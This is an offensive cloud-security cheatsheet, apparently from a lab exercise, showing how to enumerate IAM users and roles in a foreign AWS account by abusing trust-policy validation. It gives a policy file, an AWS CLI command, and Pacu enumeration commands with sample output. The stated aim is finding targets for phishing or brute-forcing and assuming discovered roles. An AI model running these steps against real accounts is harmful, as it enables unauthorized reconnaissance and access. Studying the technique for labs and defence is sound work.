Cheatsheet - AWS - Scenario - Unauthenticated IAM principal enumeration - IAM role trust policy
Overview
Utilise IAM trust policies to enumerate IAM principals in another AWS account.
Service/Tool: Pacu, IAM, awcli
Use Case: Discover IAM principals in another AWS account that can be used for further attacks such as phishing or brute-forcing etc.
Prerequisites: A valid AWS ID of the target, a AWS account to launch the attack from.
Attack Workflow
1. Step 1 (Discovery/Access) - Manual
Objective: Use Trust Policy to enumerate IAM principals in another AWS account.
Command/Method:
A Trust Policy defines which principals can assume a role and the permissions associated with it. AWS allows administrators to provide the access to roles within their account to principal's residing in another account (i.e. cross-account access).
This can be exploited as the Trust Policy requires a valid principal ARN before it will allow the Trust Policy to be saved, and therefore, the username portion of the role can be enumerated using a list of common usernames in order to gain insight in to another account's principals.
To carry this out we can create the following file - policy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "EnumRoles",
"Effect": "Deny",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "arn:aws:iam::104506445608:role/admin"
}
}
]
}
In the event that the role admin does not exist in the account ID 104506445608 then the AWS console would not allow us to save this policy with an error message stating that the specified principal ARN did not exist.
Next, using valid credentials within our own AWS account, we can perform the following:
aws iam update-assume-role-policy --role-name IAMENum --policy-document file://policy.json
An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::104506445608:role/admin"
In this example, it resulted in an error, which indicates there is no role named admin. However, it we were to update the Trust Policy with a valid principal, we receive no errors.
2. Step 2 (Discovery/Access) - Automated
Objective: Use Pacu to enumerate IAM principals in another AWS account via Trust Policies.
Command/Method:
As an automated alternative we can use the tool Pacu to enumerate these principals in an automated fashion. Pacu will also attempt to assume any roles it discovers and provide us with temporary access keys.
Pacu can be found at the following URL: https://github.com/RhinoSecurityLabs/pacu
After installing we need to configure the our AWS keys with set_keys then we can execute the following command:
run iam__enum_users --role-name IAMEnum --account-id 104506445608
This can take some time to run. It will provide us a list of users that it can been able to enumerate:
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/Bryan
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/Cloud9
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/CloudWatch
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/DatabaseAdministrator
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/DynamoDB
We can also run a similar command to enumerate roles. This command will also attempt to assume any roles it finds:
run iam__enum_roles --role-name IAMEnum --account-id 104506445608
Again, this can take some time to run. It will provide us a list of roles it has been able to enumerate plus any that it can assume anonymously:
[iam__enum_roles] Starting role enumeration...
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/APIGateway
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/Administrator
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/AutoScaling
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/DatadogAWSIntegrationRole
Notes and References
Links:
PwnedLabs - Unauthenticated AWS IAM Principals Enumeration